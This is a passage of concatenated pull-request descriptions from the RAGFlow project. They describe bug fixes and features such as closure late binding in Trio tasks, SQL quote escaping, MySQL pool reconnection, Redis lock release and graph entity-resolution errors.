concurrent tasks created in loops to reference the same variable,
resulting in all tasks processing the same data (the data from the last
iteration) rather than each task processing its corresponding data from
the loop.
## Issue Details
When using a `lambda` to create a closure function and passing it to
`nursery.start_soon()` within a loop, the lambda function captures a
reference to the loop variable rather than its value. For example:
```python
# Problematic code
async with trio.open_nursery() as nursery:
    for d in docs:
        nursery.start_soon(lambda: doc_keyword_extraction(chat_mdl, d, topn))
```
In this pattern, when concurrent tasks begin execution, `d` has already
become the value after the loop ends (typically the last element),
causing all tasks to use the same data.
## Fix Solution
Changed the way concurrent tasks are created with `nursery.start_soon()`
by leveraging Trio's API design to directly pass the function and its
arguments separately:
```python
# Fixed code
async with trio.open_nursery() as nursery:
    for d in docs:
        nursery.start_soon(doc_keyword_extraction, chat_mdl, d, topn)
```
This way, each task uses the parameter values at the time of the
function call, rather than references captured through closures.
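
The late-binding behavior itself does not depend on Trio and can be reproduced with plain Python. The sketch below uses `functools.partial` as an analogue of passing the arguments separately; `process` and `docs` are hypothetical names used only for the demonstration:

```python
from functools import partial


def process(d):
    return d


docs = ["a", "b", "c"]

# Late binding: each lambda looks up `d` when it is called, after the loop ended.
late = []
for d in docs:
    late.append(lambda: process(d))
late_results = [f() for f in late]

# Early binding: the argument is stored with the callable at creation time.
bound = []
for d in docs:
    bound.append(partial(process, d))
bound_results = [f() for f in bound]

print(late_results)   # ['c', 'c', 'c']
print(bound_results)  # ['a', 'b', 'c']
```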
## Fixed Files
Fixed closure traps in the following files:
1. `rag/svr/task_executor.py`: 3 fixes, involving document keyword
extraction, question generation, and tag processing
2. `rag/raptor.py`: 1 fix, involving document summarization
3. `graphrag/utils.py`: 2 fixes, involving graph node and edge
processing
4. `graphrag/entity_resolution.py`: 2 fixes, involving entity resolution
and graph node merging
5. `graphrag/general/mind_map_extractor.py`: 2 fixes, involving document
processing
6. `graphrag/general/extractor.py`: 3 fixes, involving content
processing and graph node/edge merging
7. `graphrag/general/community_reports_extractor.py`: 1 fix, involving
community report extraction
## Potential Impact
This fix resolves a serious concurrency issue that could have caused:
- Data processing errors (processing duplicate data)
- Performance degradation (all tasks working on the same data)
- Inconsistent results (some data not being processed)
After the fix, all concurrent tasks should correctly process their
respective data, improving system correctness and reliability.
### What problem does this PR solve?
Feat: Rendering a search test list with real data #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
… bytes-like object
### What problem does this PR solve?
Fix bug #6990: internal server error while chunking: expected string or
bytes-like object
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
- [ ] New Feature (non-breaking change which adds functionality)
- [ ] Documentation Update
- [ ] Refactoring
- [ ] Performance Improvement
- [ ] Other (please describe):
Co-authored-by: unknown <taoshi.ln@chinatelecom.cn>
### What problem does this PR solve?
https://github.com/infiniflow/ragflow/issues/7083
Internally, fields returned from ES are converted to str, so the bool
conversion does not work as expected.
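
The pitfall is that any non-empty string is truthy in Python, including `"False"`. A minimal sketch of a string-aware conversion follows; the helper `to_bool` and the accepted spellings are assumptions, not the PR's code:

```python
def to_bool(value) -> bool:
    """Interpret common string spellings of booleans; otherwise use bool()."""
    if isinstance(value, str):
        return value.strip().lower() in ("true", "1", "yes", "y")
    return bool(value)


print(bool("False"))     # True: any non-empty string is truthy
print(to_bool("False"))  # False
```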
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
When there are multiple entities, the variable `v` may be a list, which
leads to this error:
```
| File "/mnt/d/wrf/ragflow/ragflow/graphrag/utils.py", line 59, in replace_all
| result = result.replace(f"{{{k}}}", v)
| TypeError: replace() argument 2 must be str, not list
```
This PR converts `v` to a str.
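A minimal sketch of the idea, not the actual code in `graphrag/utils.py`: the standalone `replace_all` signature and the comma separator used to flatten a list are assumptions for illustration.

```python
def replace_all(template: str, replacements: dict) -> str:
    """Substitute {key} placeholders, coercing every value to str first."""
    result = template
    for k, v in replacements.items():
        # Assumption: a list of entities is flattened into one comma-separated string.
        if isinstance(v, (list, tuple)):
            v = ", ".join(str(item) for item in v)
        # str() also covers ints, floats and other non-string values.
        result = result.replace(f"{{{k}}}", str(v))
    return result


prompt = replace_all("Entities: {names}", {"names": ["ALICE", "BOB"]})
```

With this coercion, `str.replace()` always receives a string as its second argument, whatever type the caller passed in.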
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
- [ ] New Feature (non-breaking change which adds functionality)
- [ ] Documentation Update
- [ ] Refactoring
- [ ] Performance Improvement
- [ ] Other (please describe):
### What problem does this PR solve?
When running graph resolution with Infinity, if a single quotation mark
appears in the name of an entity to be deleted, sqlglot may fail to
tokenize the statement after Infinity is called.
For example:
```
INFINITY delete table ragflow_xxx, filter knowledge_graph_kwd IN ('entity') AND entity_kwd IN ('86 IMAGES FROM PREVIOUS CONTESTS', 'ADAM OPTIMIZATION', 'BACKGROUND'ESTIMATION')
```
may raise the error
```
Error tokenizing 'TS', 'ADAM OPTIMIZATION', 'BACKGROUND'ESTIMATION''
```
and cause document parsing to fail.
Replacing each single quotation mark with two single quotation marks
lets sqlglot tokenize the entity name correctly.
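The escaping rule can be sketched as follows. The helper names `quote_sql_string` and `in_filter` are hypothetical and only illustrate the quote doubling; they are not the functions changed in this PR.

```python
def quote_sql_string(value: str) -> str:
    """Wrap value in single quotes, doubling any embedded single quote."""
    return "'" + value.replace("'", "''") + "'"


def in_filter(column: str, values: list) -> str:
    """Build a `column IN (...)` filter from raw string values."""
    quoted = ", ".join(quote_sql_string(v) for v in values)
    return f"{column} IN ({quoted})"


cond = in_filter("entity_kwd", ["ADAM OPTIMIZATION", "BACKGROUND'ESTIMATION"])
```

Here `cond` contains `'BACKGROUND''ESTIMATION'`, which a SQL tokenizer reads as one string literal holding a single quote.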
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
The assistant message placeholder was incorrect. I have corrected it in
both the Chinese and Traditional Chinese translations.
### Type of change
- [x] Bug Fix
### Related Issue:
https://github.com/infiniflow/ragflow/issues/6548
### Related PR:
https://github.com/infiniflow/ragflow/pull/6861
### Environment:
Commit version:
[[48730e0](48730e00a8)]
### Bug Description:
Unexpected `pymysql.err.InterfaceError: (0, '')` when using Peewee +
PyMySQL + PooledMySQLDatabase after a long-running `chat streamly`
operation.
This is a common issue with Peewee + PyMySQL + connection pooling: you
end up using a connection that was silently closed by the server, but
Peewee doesn't realize it's dead.
**I found that the error only occurs during longer streaming outputs**
and is unrelated to the database connection context, so it's likely
because:
- The prolonged streaming response caused the database connection to
time out
- The original database connection might have been disconnected by the
server during the streaming process
### Why This Happens
This error happens even when using `@DB.connection_context()` after the
stream is done. After investigation, I found this is caused by pooled
MySQL connections that appear to be open but are actually dead (expired
due to `wait_timeout`).
1. `@DB.connection_context()` (as a decorator or context manager) pulls
a connection from the pool.
2. If this connection was idle and expired on the MySQL server (e.g.,
due to `wait_timeout`), but not closed in Python, it will still be
considered “open” (`DB.is_closed() == False`).
3. The real error occurs only when I execute a SQL command (such as
`.get_or_none()`) and PyMySQL tries to send it to the server via a
broken socket.
### Changes Made:
1. I implemented manual connection checks before executing SQL:
```
try:
    DB.execute_sql("SELECT 1")
except Exception:
    print("Connection dead, reconnecting...")
    DB.close()
    DB.connect()
```
2. Delayed the token count update until after the streaming response is
completed to ensure the streaming output isn't interrupted by database
operations.
```
total_tokens = 0
for txt in chat_streamly(system, history, gen_conf):
    if isinstance(txt, int):
        total_tokens = txt
        ......
        break
    ......
if total_tokens > 0:
    if not TenantLLMService.increase_usage(self.tenant_id, self.llm_type, txt, self.llm_name):
        logging.error("LLMBundle.chat_streamly can't update token usage for {}/CHAT llm_name: {}, content: {}".format(self.tenant_id, self.llm_name, txt))
```
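The connection check from step 1 can be wrapped in a small helper. This is a sketch under assumptions: `ensure_connection` is a hypothetical name, and `db` is any object exposing Peewee's `execute_sql`, `is_closed`, `close` and `connect` methods.

```python
import logging


def ensure_connection(db) -> bool:
    """Ping db with a trivial query and reconnect if the ping fails.

    Returns True when a reconnect was needed, False otherwise.
    """
    try:
        db.execute_sql("SELECT 1")
        return False
    except Exception:
        logging.warning("Connection dead, reconnecting...")
        # The handle may still look open on the Python side; close it first.
        if not db.is_closed():
            db.close()
        db.connect()
        return True
```

Calling such a helper right before the token-usage update, once streaming has finished, keeps the ping close to the query it protects.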
### What problem does this PR solve?
Fix: Files being parsed are not allowed to be deleted in batches #7065
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
docs(api): Fix request method in Related Questions example (DELETE→POST)
### Type of change
- [x] Documentation Update
### What problem does this PR solve?
https://github.com/infiniflow/ragflow/issues/6905
When deleting a document, perform a check before removing it from storage.
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Add fallback for bad citation output. #6948
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Fix the Helm Ingress template, which tried to access a global variable
within a loop.
Fix #6191
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
- [ ] New Feature (non-breaking change which adds functionality)
- [ ] Documentation Update
- [ ] Refactoring
- [ ] Performance Improvement
- [ ] Other (please describe):
### What problem does this PR solve?
Feat: Remove the rotation state of the button that parses the document
#7008
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Fix: The selected state of the TreeView node cannot be seen on Mac #7000
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Fix update_progress issue introduced by #6975
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Fix: Fix api page translation issue. #3221
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Sometimes a slide may trigger a Proxy error (ArgumentException:
Parameter is not valid) due to issues in the original file, and this
error message can be confusing for users.
### Type of change
- [ ] Bug Fix (non-breaking change which fixes an issue)
- [ ] New Feature (non-breaking change which adds functionality)
- [ ] Documentation Update
- [ ] Refactoring
- [ ] Performance Improvement
- [x] Other (please describe):
### What problem does this PR solve?
Because the ragflow_deps image is only available for the `linux/amd64`
platform, running the docker build commands on macOS, for instance,
without the platform flag fails with a platform mismatch error.
Specifying the platform in the docker build command fixes this issue.
### Type of change
- [ ] Bug Fix (non-breaking change which fixes an issue)
- [ ] New Feature (non-breaking change which adds functionality)
- [X] Documentation Update
- [ ] Refactoring
- [ ] Performance Improvement
- [ ] Other (please describe):
I use PdfParser locally (following this example:
https://github.com/infiniflow/ragflow/blob/main/rag/app/paper.py) like
this:
```
import re
import openpyxl
from ragflow.api.db import ParserType
from ragflow.rag.nlp import rag_tokenizer, tokenize, tokenize_table, add_positions, bullets_category, \
    title_frequency, \
    tokenize_chunks
from ragflow.rag.utils import num_tokens_from_string
from ragflow.deepdoc.parser import PdfParser, ExcelParser, DocxParser, PlainParser
def logger(prog=None, msg=""):
    print(msg)
class Pdf(PdfParser):
    def __init__(self):
        self.model_speciess = ParserType.MANUAL.value
        super().__init__()
    def __call__(self, filename, binary=None, from_page=0,
                 to_page=100000, zoomin=3, callback=None):
        from timeit import default_timer as timer
        start = timer()
        callback(msg="OCR is running...")
        self.__images__(
            filename if not binary else binary,
            zoomin,
            from_page,
            to_page,
            callback
        )
        callback(msg="OCR finished.")
        print("OCR:", timer() - start)
        self._layouts_rec(zoomin)
        callback(0.65, "Layout analysis finished.")
        print("layouts:", timer() - start)
        self._table_transformer_job(zoomin)
        callback(0.67, "Table analysis finished.")
        self._text_merge()
        tbls = self._extract_table_figure(True, zoomin, True, True)
        self._concat_downward()
        self._filter_forpages()
        callback(0.68, "Text merging finished")
        # clean mess
        for b in self.boxes:
            b["text"] = re.sub(r"([\t ]|\u3000){2,}", " ", b["text"].strip())
        return [(b["text"], b.get("layout_no", ""), self.get_position(b, zoomin))
                for i, b in enumerate(self.boxes)], tbls
```
This fails with the following error:
```
File "xxxxx/third_party/ragflow/deepdoc/parser/pdf_parser.py", line 1039, in __images__
self.pdf.close()
AttributeError: 'PdfReader' object has no attribute 'close'
```
I found that the ragflow source code uses `pdfplumber.open`
(https://github.com/infiniflow/ragflow/blob/main/deepdoc/parser/pdf_parser.py#L1007C28-L1007C43)
and then replaces `self.pdf` with `pdf2_read` (`from pypdf import
PdfReader as pdf2_read`) at line 1024
(https://github.com/infiniflow/ragflow/blob/main/deepdoc/parser/pdf_parser.py#L1024):
```
self.pdf = pdf2_read
```
---
and I found that `pdfplumber` can be used in this way:
```
file_path="xxx.pdf"
res = pdfplumber.open(file_path)
res.close()
```
but the `pypdf.PdfReader` source code has no `close` method; the source
reads the file like this:
```
with open(stream, "rb") as fh:
    stream = BytesIO(fh.read())
self._stream_opened = True
```
> https://github.com/py-pdf/pypdf/blob/main/pypdf/_reader.py#L156
So I moved the `self.pdf.close` call, which fixes this problem.
I hope this helps the project 😊
ragflow v0.17 also hits this problem (#1453). The task table shows that
the task has actually completed, but because the task's process_msg is
not synchronized to the document table, the page shows no progress
update.
This may be caused by the lock not being released when an exception
occurs.
```/api/ragflow_server.py
def update_progress():
    lock_value = str(uuid.uuid4())
    redis_lock = RedisDistributedLock("update_progress", lock_value=lock_value, timeout=60)
    logging.info(f"update_progress lock_value: {lock_value}")
    while not stop_event.is_set():
        try:
            if redis_lock.acquire():
                DocumentService.update_progress()
                redis_lock.release()
            stop_event.wait(6)
        except Exception:
            logging.exception("update_progress exception")
++          if redis_lock.acquired:
++              redis_lock.release()
```
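An alternative way to guarantee the release is a `try`/`finally` around the protected work. This is a sketch, not the change proposed above: `run_with_lock` is a hypothetical helper, and `lock` is assumed to be any object with `acquire()` returning a bool and `release()`.

```python
import logging


def run_with_lock(lock, work) -> bool:
    """Run work() while holding lock, releasing it even if work() raises.

    Returns False when the lock could not be acquired.
    """
    if not lock.acquire():
        return False
    try:
        work()
    except Exception:
        logging.exception("update_progress exception")
    finally:
        # Runs on both the success path and the exception path.
        lock.release()
    return True
```

The `finally` clause covers both paths with one `release()` call, so no separate check of the lock state is needed in the exception handler.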
### What problem does this PR solve?
Fix KB update_time changed whenever system relaunched. #6953
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Sometimes the `s` in a chunk `(s, a)` is an empty string. The condition
`if s and len(a) > 0` in the line `chunks = [(s, a) for s, a in chunks
if s and len(a) > 0]` then filters that chunk out, which changes the
length of the new `chunks` list. As a result, the final assertion
`assert len(chunks) - end == n_clusters, "{} vs. {}".format(len(chunks)
- end, n_clusters)` fails and raises a confusing error like `7 vs. 8`.
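The length change can be reproduced with a few made-up chunks (the strings and vectors below are invented for illustration):

```python
# Three (text, embedding) pairs; the second one has an empty text.
chunks = [("summary a", [0.1, 0.2]), ("", [0.3, 0.4]), ("summary c", [0.5, 0.6])]
n_before = len(chunks)

# The same filter as quoted above: an empty `s` drops the whole pair.
filtered = [(s, a) for s, a in chunks if s and len(a) > 0]
n_dropped = n_before - len(filtered)
```

One pair is silently dropped here, so any later count that assumes every chunk survived the filter is off by one.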
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
- [ ] New Feature (non-breaking change which adds functionality)
- [ ] Documentation Update
- [ ] Refactoring
- [ ] Performance Improvement
- [ ] Other (please describe):
### What problem does this PR solve?
Fix: In the dark night theme, the message input box is not displayed
correctly. #6950
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### Related Issue:
https://github.com/infiniflow/ragflow/issues/6741
### Environment:
Using nightly version
Commit version:
[[6051abb](6051abb4a3)]
### Bug Description:
The retrieval function in rag/nlp/search.py returns the original total
chunk count even after chunks are filtered by similarity_threshold. This
creates an inconsistency between the chunks actually returned and the
reported total.
### Changes Made:
- Added code to count how many search results actually meet or exceed
the configured similarity threshold.
- Positioned the calculation after the doc_ids conditional logic to
ensure special cases are handled correctly.
- Updated the ranks["total"] value to store this filtered count instead
of the raw search result count.
- Used NumPy, whose optimized C-level batch operations keep the count
fast.
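The counting step can be sketched in plain Python. The function name `count_above_threshold` and the sample scores are assumptions for illustration; the NumPy form mentioned above appears only as a comment.

```python
def count_above_threshold(similarities, threshold: float) -> int:
    """Count the scores that meet or exceed threshold."""
    # NumPy equivalent: int(np.sum(np.asarray(similarities) >= threshold))
    return sum(1 for score in similarities if score >= threshold)


ranks = {"total": 0, "chunks": []}
sim = [0.91, 0.15, 0.42, 0.2, 0.05]
# Report the filtered count rather than len(sim).
ranks["total"] = count_above_threshold(sim, threshold=0.2)
```

With these scores the reported total is 3 instead of 5, matching the number of chunks that survive the threshold.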
### What problem does this PR solve?
Feat: Add translation text to the prompt word of the generate operator
to distinguish it from the prompt word of the knowledge base #6934
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
- Return 3 similarity scores in the chat completion's `reference`
field. This gives users more transparency and the flexibility to
display or rerank the references when needed.
Co-authored-by: Yingfeng <yingfeng.zhang@gmail.com>
### What problem does this PR solve?
Fix: remove deprecated KB updating `permission` field. #6911
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Fix: local variable referenced before assignment. #6803
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
The old logic filters out all assistant messages from messages, which,
in multi-turn conversations, results in only user messages being
retained. This leads to an error in locally deployed models:
Conversation roles must alternate user/assistant/user/assistant/...
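To illustrate why the filtered history is rejected, here is a small checker for the alternation rule. `roles_alternate` is a hypothetical helper written for this example, not the check a local model server actually runs.

```python
def roles_alternate(messages) -> bool:
    """True if roles go user, assistant, user, ... starting with user."""
    expected = "user"
    for m in messages:
        if m["role"] != expected:
            return False
        expected = "assistant" if expected == "user" else "user"
    return True


history = [
    {"role": "user", "content": "Hi"},
    {"role": "assistant", "content": "Hello!"},
    {"role": "user", "content": "What is RAG?"},
]
# The old filtering: every assistant message is removed.
only_user = [m for m in history if m["role"] != "assistant"]
```

The full `history` passes the check, while `only_user` contains two consecutive user messages and fails it.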
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
- [ ] New Feature (non-breaking change which adds functionality)
- [ ] Documentation Update
- [ ] Refactoring
- [ ] Performance Improvement
- [ ] Other (please describe):
### What problem does this PR solve?
Feat: Install sonner library #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Fix the issue where waiting tasks couldn't be processed when upstream
components were "switch", "categorize", or "relevant" and the normal
processing path couldn't continue.
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
- [ ] New Feature (non-breaking change which adds functionality)
- [ ] Documentation Update
- [ ] Refactoring
- [ ] Performance Improvement
- [ ] Other (please describe):
### What problem does this PR solve?
This PR introduces **primitive support for function calls**,
enabling the system to handle basic function call capabilities.
However, this feature is currently experimental and **not yet enabled
for general use**, as it is only supported by a subset of models,
namely, Qwen and OpenAI models.
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Fixes #6548
Add exception handling to prevent exceptions from propagating back to
the web, which may lead to failure in displaying conversation content.
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
- [ ] New Feature (non-breaking change which adds functionality)
- [ ] Documentation Update
- [ ] Refactoring
- [ ] Performance Improvement
- [ ] Other (please describe):
Co-authored-by: cm <caiming@sict.ac.cn>
[When parsing documents with graph, an error occurred: [ERROR][Exception]: 'method'](https://github.com/infiniflow/ragflow/issues/6835)
### What problem does this PR solve?
Close #6786
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
- [ ] New Feature (non-breaking change which adds functionality)
- [ ] Documentation Update
- [ ] Refactoring
- [ ] Performance Improvement
- [ ] Other (please describe):
Co-authored-by: cm <caiming@sict.ac.cn>
### What problem does this PR solve?
This PR addresses the build and dependency issues faced by developers in
regions with poor connectivity to official Ubuntu repositories and
standard dependency sources. Currently, developers in these regions
experience slow or failed Docker builds and dependency downloads,
significantly impacting development efficiency.
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
- [ ] New Feature (non-breaking change which adds functionality)
- [ ] Documentation Update
- [ ] Refactoring
- [ ] Performance Improvement
- [ ] Other (please describe):
The changes include:
1. Modified Dockerfile to use alternative Ubuntu mirrors with better
connectivity in affected regions
2. Added a new script (download_deps_CN.py) that provides
region-specific alternative download links for dependencies
### What problem does this PR solve?
#6731 #6722
### Type of change
- [ ] Documentation Update
---------
Co-authored-by: Zhichang Yu <yuzhichang@gmail.com>
### What problem does this PR solve?
Feat: Load the dialog page, prohibit calling the dialog/get interface
#6798
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
fix redis pvc in helm deployment
### What problem does this PR solve?
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
add openai agent
### Type of change
- [ ] Bug Fix (non-breaking change which fixes an issue)
- [x] New Feature (non-breaking change which adds functionality)
- [ ] Documentation Update
- [ ] Refactoring
- [ ] Performance Improvement
- [ ] Other (please describe):
---------
Co-authored-by: Kevin Hu <kevinhu.sh@gmail.com>
### What problem does this PR solve?
Feat: Clarify the use of OpenAI-API-compatible #6782
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
…gic to return the correct deletion message. Add handling for empty
arrays to ensure no errors occur during the deletion operation. Update
the test cases to verify the new logic.
### What problem does this PR solve?
Fix this bug: https://github.com/infiniflow/ragflow/issues/6607
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
---------
Co-authored-by: wenju.li <wenju.li@deepctr.cn>
### What problem does this PR solve?
Align the default values in the create chat assistant HTTP API docs with
the implementation.
llm.presence_penalty 0.2 -> 0.4
prompt.top_n 8->6
### Type of change
- [x] Documentation Update
### What problem does this PR solve?
Fix: Issue with Markdown Code Blocks Breaking Frontend Layout #5789
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
…cument_ids" to maintain consistency.
### What problem does this PR solve?
Close #6752
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
Co-authored-by: wenju.li <wenju.li@deepctr.cn>
### What problem does this PR solve?
Fix: The file upload prompt indicates "No authorization." #6516
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Fix: Using the Enter key does not send a complete message #6754
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Feat: Support deleting knowledge graph #6747
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Feat: Add a notification logic to the team member invite feature #6610
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Feat: Interrupt streaming #6515
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Fix #6085
RagTokenizer's dfs_() function falls into infinite recursion when
processing text with repetitive Chinese characters (e.g.,
"一一一一一十一十一十一..." or "一一一一一一十十十十十十十二十二十二..."), causing memory leaks.
### Type of change
Implemented three optimizations to the dfs_() function:
1. Added memoization with a _memo dictionary to cache computed results
2. Added recursion depth limiting with a _depth parameter (max 10 levels)
3. Implemented special handling for repetitive character sequences
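The first two optimizations can be sketched on a toy segmenter. This is not the `dfs_()` from `RagTokenizer`: the `segment` function, its `vocab` argument, the fewest-tokens scoring and the character-by-character fallback at the depth limit are all assumptions for illustration.

```python
def segment(text: str, vocab: set, max_depth: int = 10) -> list:
    """Split text into vocab words (or single characters), preferring fewer tokens."""
    memo = {}  # start index -> best segmentation of text[start:]

    def dfs(start: int, depth: int) -> list:
        if start == len(text):
            return []
        if depth > max_depth:
            # Depth limit reached: stop exploring, emit the rest one character at a time.
            return list(text[start:])
        if start in memo:
            return memo[start]
        best = None
        for end in range(start + 1, len(text) + 1):
            piece = text[start:end]
            # A single character is always allowed so that every text can be segmented.
            if piece in vocab or end == start + 1:
                candidate = [piece] + dfs(end, depth + 1)
                if best is None or len(candidate) < len(best):
                    best = candidate
        memo[start] = best
        return best

    return dfs(0, 0)


tokens = segment("一一一一", {"一一"})
```

Because each start index is solved once and then cached, repetitive input no longer triggers an exponential number of recursive calls, and the depth limit bounds the call stack.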
- [x] Bug Fix (non-breaking change which fixes an issue)
Co-authored-by: Kevin Hu <kevinhu.sh@gmail.com>
I'm really sorry, I found that in graphrag/general/extractor.py under
def __call__, the line change.removed_nodes.extend(nodes[1:]) causes an
AttributeError: 'set' object has no attribute 'extend'. Could you please
merge the branch e666528 again? I made some modifications.
### What problem does this PR solve?
Feat: Allows users to search for models in the model selection drop-down
box #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### Related Issue:
https://github.com/infiniflow/ragflow/issues/6653
### Environment:
Using nightly version [ece5903]
Elasticsearch database
Thanks for the review! My fault: I realize my initial testing didn't
pass.
In graphrag/entity_resolution.py
`sub_connect_graph` is a set like `{'HELLO', 'Hi', 'How are you'}`,
so neither `.nodes` nor `.nodes()` works; **both still cause
`AttributeError: 'set' object has no attribute 'nodes'`**
In graphrag/general/extractor.py
The `list.extend()` method operates in place: it modifies the original
list and returns `None` rather than the modified list.
Neither
`sorted(set(node0_attrs[attr].extend(node1_attrs.get(attr, []))))` nor
`sorted(set(node0_attrs[attr].extend(node1_attrs[attr])))` works;
**both still cause `TypeError: 'NoneType' object is not iterable`**
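A short demonstration of the `extend()` behavior and one way to merge the attribute lists without it. The sample attribute values are made up, and the concatenation shown is a sketch rather than the exact fix in `extractor.py`.

```python
node0_attrs = {"source_id": ["doc1", "doc2"]}
node1_attrs = {"source_id": ["doc2", "doc3"]}
attr = "source_id"

# list.extend() mutates in place and returns None, so it cannot be nested in set(...).
returned = node0_attrs[attr].copy().extend(node1_attrs[attr])

# Concatenate into a new list instead, then de-duplicate and sort.
merged = sorted(set(node0_attrs[attr] + node1_attrs.get(attr, [])))
```

`returned` is `None`, which is what `set()` received in the failing expression, while `merged` holds the de-duplicated, sorted values.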
### Type of change
- [ ] Bug Fix AttributeError: graphrag/entity_resolution.py
- [ ] Bug Fix TypeError: graphrag/general/extractor.py
### Related Issue: #6653
### Environment:
Using nightly version
Elasticsearch database
### Bug Description:
When clicking the "Entity Resolution" button in KnowledgeGraph,
encountered the following errors:
graphrag/entity_resolution.py
```
list(sub_connect_graph.nodes) AttributeError
```
graphrag/general/extractor.py
```
node0_attrs[attr] = sorted(set(node0_attrs[attr].extend(node1_attrs[attr])))
TypeError: 'NoneType' object is not iterable
```
```
for attr in ["keywords", "source_id"]:
KeyError I think attribute "keywords" is in edges not nodes
```
graphrag/utils.py
```
settings.docStoreConn.delete() # Sync function called as async
```
### Changes Made:
- Fixed the AttributeError in entity_resolution.py by properly handling
graph nodes
- Fixed the TypeError and KeyError in extractor.py by separating the
operations
- Corrected the async/sync mismatch in the document deletion call
### What problem does this PR solve?
- Added support for S3-compatible protocols.
- Enabled the use of knowledge base ID as a file prefix when storing
files in S3.
- Updated docker/README.md to include detailed S3 and OSS configuration
instructions.
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
https://github.com/infiniflow/ragflow/issues/6138
This PR adds vision LLM support for GPUStack and changes the URL path
from `/v1-openai` to `/v1`.
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
### Type of change
- [x] Documentation Update
---------
Co-authored-by: balibabu <cike8899@users.noreply.github.com>
### What problem does this PR solve?
Fix #6334
Hello, I encountered the same problem as in #6334. In
`api/db/db_models.py`, `init_database_tables` calls `obj.create_table()`
unconditionally, before `migrate_db()`. Specifically, the `permission`
field of the `user_canvas` table has `index=True`, which causes `peewee`
to issue SQL that tries to create the index when the field does not
exist yet (the `user_canvas` table already exists), so
`psycopg2.errors.UndefinedColumn: column "permission" does not exist`
occurred.
I've added a check in the code to call `create_table()` only when the
table does not exist, and to delegate the migration process to
`migrate_db()`.
Then another problem occurs: `migrate_db()` actually does nothing
because it failed on the first migration! `playhouse` blindly issues
DDL without clauses like `IF NOT EXISTS`, so it fails... even if the
exception is swallowed with `pass`, the transaction is still rolled
back. So I removed the transaction in `migrate_db()` to make it work.
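The added check can be sketched as below. This is an illustration, not the code in `api/db/db_models.py`: the `models` argument and the returned list are assumptions, while `table_exists()` and `create_table()` are the Peewee model class methods the description refers to.

```python
def init_database_tables(models) -> list:
    """Create only the tables that are missing; return the names created."""
    created = []
    for model in models:
        # Existing tables are left untouched here and handled by the migration step.
        if not model.table_exists():
            model.create_table()
            created.append(model.__name__)
    return created
```

Skipping `create_table()` for existing tables avoids issuing index DDL for columns that only the migration step will add.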
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
- [ ] New Feature (non-breaking change which adds functionality)
- [ ] Documentation Update
- [ ] Refactoring
- [ ] Performance Improvement
- [ ] Other (please describe):
### What problem does this PR solve?
Actually fix #6241
Hello, I ran into the same problem as #6241. When I'm testing my agent
flow in the web ui using `Run` button with a file input, the retrieval
component always gave an empty output.
In the code I found that:
`web/src/pages/flow/debug-content/index.tsx`:
```tsx
const onOk = useCallback(async () => {
  const values = await form.validateFields();
  const nextValues = Object.entries(values).map(([key, value]) => {
    const item = parameters[Number(key)];
    let nextValue = value;
    if (Array.isArray(value)) {
      nextValue = ``;
      value.forEach((x) => {
        nextValue +=
          x?.originFileObj instanceof File
            ? `${x.name}\n${x.response?.data}\n----\n` // Here, the file content always ends in '\n'
            : `${x.url}\n${x.result}\n----\n`;
      });
    }
    return { ...item, value: nextValue };
  });
  ok(nextValues);
}, [form, ok, parameters]);
```
while in the `agent/component/retrieval.py`:
```python
def _run(self, history, **kwargs):
    query = self.get_input()
    query = str(query["content"][0]) if "content" in query else ""
    lines = query.split('\n')  # inputs are split to ['xxx','yyy','----','']
    query = lines[-1] if lines else ""  # Here we always get '', thus no result
    kbs = KnowledgebaseService.get_by_ids(self._param.kb_ids)
    if not kbs:
        return Retrieval.be_output("")
```
so the code never gets a correct result.
I'm not sure why the input needs such a split here, so I just removed
the splitting, and it works well on my side.
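The empty query is easy to reproduce in isolation. The file name and content below are made up; only the `name\ncontent\n----\n` layout is taken from the frontend code above.

```python
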